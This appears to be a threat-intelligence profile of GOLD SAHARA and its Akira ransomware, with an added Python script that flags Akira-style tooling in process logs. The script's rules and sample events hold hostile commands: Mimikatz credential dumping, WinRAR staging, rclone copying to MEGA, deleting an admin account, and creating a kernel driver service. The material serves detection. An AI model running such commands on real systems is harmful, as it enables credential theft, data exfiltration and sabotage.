Summary
GOLD SAHARA is a cybercrime group that operates the Akira ransomware scheme. Despite not advertising for affiliates on underground forums or its leak site, the rate of victim naming indicates that a large group of individuals is responsible for deploying Akira ransomware, likely in a private ransomware-as-a-service (RaaS) arrangement. The first Akira victim was named on a dedicated leak site in April 2023 and GOLD SAHARA continued listing victims at a rate of around 25 a month until late 2024, when activity accelerated significantly. From that point, the Akira leak site has consistently seen over 50 victim names listed each month.
A popular initial access vector in Akira ransomware compromises is the exploitation of vulnerabilities in VPN services, including those in Cisco products. In mid-2025, Sophos analysts observed a surge in activity in which attackers targeted a vulnerability in SonicWall SSLVPN appliances to gain access to victim networks and attempt to deploy Akira. The threat actors used valid credentials and bypassed multi-factor authentication (MFA), likely by exploiting CVE-2024-40766.
GOLD SAHARA affiliates use a wide variety of tools in their network compromises, many of which are available off-the-shelf or as built-in utilities. These include PCHunter64, AdFind, Advanced IP Scanner, and the SoftPerfect Network Scanner for system and network discovery, and the built-in Nltest Windows utility to identify domain trusts and domain controllers. Mimikatz and LaZagne are used for harvesting credentials. Remote monitoring and management (RMM) tools, such as AnyDesk, Level.io, and LogMeIn, are used for remote access, as is the PuTTY SSH client. Affiliates have been observed using DLL sideloading in operations, and a bring your own vulnerable driver (BYOVD) technique to disable antivirus (AV) and endpoint detection and response (EDR) solutions for defense evasion. The WinRAR archiving tool is used to stage data for exfiltration via Rclone or the MEGA cloud storage service. Affiliates have also been observed accessing and downloading SharePoint files for use in extortion attempts. Prior to deploying ransomware, attackers have deleted administrator accounts, likely to hinder recovery efforts.
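Because most of the tooling above is legitimate or built-in, it is the command lines and binary metadata, not file hashes, that defenders can hunt on. The following is an added triage example written for this page, not Secureworks detection content or the threat actors' tooling: it walks process-creation events exported as newline-delimited JSON with Sysmon Event ID 1 style field names (Image, OriginalFileName, CommandLine, Computer, User; these names are an assumption about the export format) and flags the behaviours described in the paragraph: Nltest trust enumeration, discovery tools, Mimikatz/LaZagne (including a renamed binary caught via OriginalFileName), RMM launch, WinRAR staging, Rclone transfer, administrator account deletion, and a kernel driver service being created in the way BYOVD tooling typically does. The sample events are constructed for illustration and the rules are heuristics to be tuned per environment.

```python
"""Triage Sysmon-style process-creation events for Akira-style tooling.

Added example for this page; heuristics and sample events are constructed.
"""
import json
import re
from pathlib import PureWindowsPath

# rule name -> (regex on image/OriginalFileName basename, optional regex on CommandLine)
RULES = {
    "nltest_domain_enum": (r"^nltest\.exe$", r"/(domain_trusts|dclist)"),
    "discovery_tooling": (r"^(adfind|advanced_ip_scanner|netscan|pchunter64)\.exe$", None),
    "credential_harvesting": (r"^(mimikatz|lazagne)\.exe$", None),
    "rmm_tool": (r"^anydesk\.exe$", None),           # extend with other RMM binaries in use
    "winrar_staging": (r"^(rar|winrar)\.exe$", r"(^|\s)a\s"),  # 'a' = add to archive
    "rclone_transfer": (r"^rclone\.exe$", r"\b(copy|sync|move)\b"),
    "admin_account_deletion": (r"^net1?\.exe$", r"\buser\b\s+\S+\s+/del(ete)?\b"),
    "kernel_driver_service": (r"^sc\.exe$", r"\bcreate\b.*type=\s*kernel"),
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('C:\\X\\Rar.exe' -> 'rar.exe')."""
    return PureWindowsPath(path).name.lower()


def match_event(event: dict) -> list[str]:
    """Return the names of every rule the event satisfies (usually zero or one)."""
    name = basename(event.get("Image", ""))
    # OriginalFileName comes from the PE version resource, so it survives a rename on disk.
    original = event.get("OriginalFileName", "").lower()
    cmdline = event.get("CommandLine", "")
    hits = []
    for rule, (image_re, cmd_re) in RULES.items():
        if not (re.match(image_re, name) or re.match(image_re, original)):
            continue
        if cmd_re and not re.search(cmd_re, cmdline, re.IGNORECASE):
            continue
        hits.append(rule)
    return hits


def triage(ndjson: str) -> list[dict]:
    """Parse NDJSON events and return one finding per (event, rule) match, in input order."""
    findings = []
    for line in ndjson.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        for rule in match_event(event):
            findings.append({
                "rule": rule,
                "host": event.get("Computer"),
                "user": event.get("User"),
                "cmd": event.get("CommandLine"),
            })
    return findings


# Constructed sample telemetry (not real incident data). Raw strings keep the JSON escapes intact.
SAMPLE_EVENTS = "\n".join([
    r'{"Computer":"WS01","User":"CORP\\jdoe","Image":"C:\\Windows\\System32\\nltest.exe","CommandLine":"nltest /domain_trusts /all_trusts"}',
    r'{"Computer":"WS01","User":"CORP\\jdoe","Image":"C:\\Users\\Public\\AdFind.exe","OriginalFileName":"AdFind.exe","CommandLine":"AdFind.exe -f objectcategory=computer"}',
    r'{"Computer":"WS01","User":"CORP\\jdoe","Image":"C:\\Users\\Public\\svchost.exe","OriginalFileName":"mimikatz.exe","CommandLine":"svchost.exe privilege::debug sekurlsa::logonpasswords"}',
    r'{"Computer":"WS01","User":"CORP\\jdoe","Image":"C:\\ProgramData\\AnyDesk\\AnyDesk.exe","OriginalFileName":"AnyDesk.exe","CommandLine":"AnyDesk.exe"}',
    r'{"Computer":"FS01","User":"CORP\\svc_backup","Image":"C:\\Program Files\\WinRAR\\Rar.exe","CommandLine":"Rar.exe a -r -hpSecret C:\\Temp\\out.rar \\\\FS01\\Share\\Finance"}',
    r'{"Computer":"FS01","User":"CORP\\svc_backup","Image":"C:\\Temp\\rclone.exe","CommandLine":"rclone.exe copy C:\\Temp\\out.rar mega:exfil --transfers 16"}',
    r'{"Computer":"DC01","User":"CORP\\svc_backup","Image":"C:\\Windows\\System32\\net.exe","CommandLine":"net user itadmin /delete"}',
    r'{"Computer":"DC01","User":"CORP\\svc_backup","Image":"C:\\Windows\\System32\\sc.exe","CommandLine":"sc create drv type= kernel binPath= C:\\Windows\\Temp\\x.sys"}',
    r'{"Computer":"WS02","User":"CORP\\asmith","Image":"C:\\Windows\\System32\\notepad.exe","CommandLine":"notepad.exe notes.txt"}',
])

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['rule']:24} {f['host']:5} {f['user']:16} {f['cmd']}")
```

The OriginalFileName check is what catches the renamed Mimikatz event; it is also the first thing to verify if an EDR shows an unfamiliar binary name. The WinRAR and Rclone rules will fire on legitimate backup jobs in some environments, so scope them to hosts or accounts that should not be archiving or syncing data, and treat the net user /delete and kernel-driver service rules as high-priority alerts when they come from the same account within a short window, as in the constructed sequence here.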
The original version of Akira ransomware was written in C++ and files encrypted using it were appended with the .akira extension. From mid-2023, third-party researchers identified some Akira incidents that involved deployment of the Rust-based Megazord encryptor, which appends files with the .powerranges extension. This, and a new version of Akira called Akira_v2, are used interchangeably by affiliates, meaning that .akira, .aki, .akiranew, or .powerranges file extensions might be seen in ransomware operations.
